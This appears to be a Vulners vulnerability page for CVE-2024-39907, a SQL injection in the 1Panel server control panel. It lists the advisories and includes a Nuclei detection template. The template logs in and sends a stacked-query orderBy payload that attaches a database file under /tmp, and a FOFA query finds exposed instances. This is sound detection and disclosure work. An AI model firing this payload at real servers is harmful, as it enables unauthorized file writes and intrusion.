| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the 1Panel Linux server control panel, related to the lack of security measures for SQL query structures, allows attackers to gain unauthorized access to protected information and execute arbitrary code. | 31 Jul 202400:00 | – | bdu_fstec | |
| CVE-2024-39907 | 18 Jul 202407:54 | – | circl | |
| 1Panel 安全漏洞 | 18 Jul 202400:00 | – | cnnvd | |
| 1Panel SQL Injection Vulnerability | 24 Jul 202400:00 | – | cnvd | |
| CVE-2024-39907 | 18 Jul 202415:31 | – | cve | |
| CVE-2024-39907 a sqlinjection in 1Panel | 18 Jul 202415:31 | – | cvelist | |
| 1Panel has an SQL injection issue related to the orderBy clause | 18 Jul 202414:25 | – | github | |
| 1Panel has an SQL injection issue related to the orderBy clause | 18 Jul 202400:00 | – | gitlab | |
| CVE-2024-39907 | 18 Jul 202416:15 | – | nvd | |
| CVE-2024-39907 a sqlinjection in 1Panel | 18 Jul 202415:31 | – | osv |
id: CVE-2024-39907
info:
name: 1Panel SQL Injection - Authenticated
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
impact: |
Authenticated attackers can exploit SQL injection vulnerabilities to execute arbitrary SQL queries, write files, and achieve remote code execution.
remediation: |
Upgrade to 1Panel version 1.10.12-lts or later.
reference:
- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-39907
cwe-id: CWE-89
epss-score: 0.29396
epss-percentile: 0.9795
cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
product: 1panel
vendor: fit2cloud
tags: cve,cve2024,sqli,1panel,authenticated,vuln
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v1/auth/login HTTP/1.1
Host: {{Hostname}}
EntranceCode: ZW50cmFuY2U=
Content-Type: application/json
{"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}
- |
POST /api/v1/hosts/command/search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_all(body_2, "SQL logic error","table exp already exists")
- contains(header_1, 'psession')
condition: and
# digest: 490a00463044022017beb1fa7d39fad32dde707fa06eb8b4fe630e610c30d5207a3172b7beb6b4cb022063a991ca4d6a96e060019e5445e5984da8eaf3e87028dbe92e229179b72fcf72:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation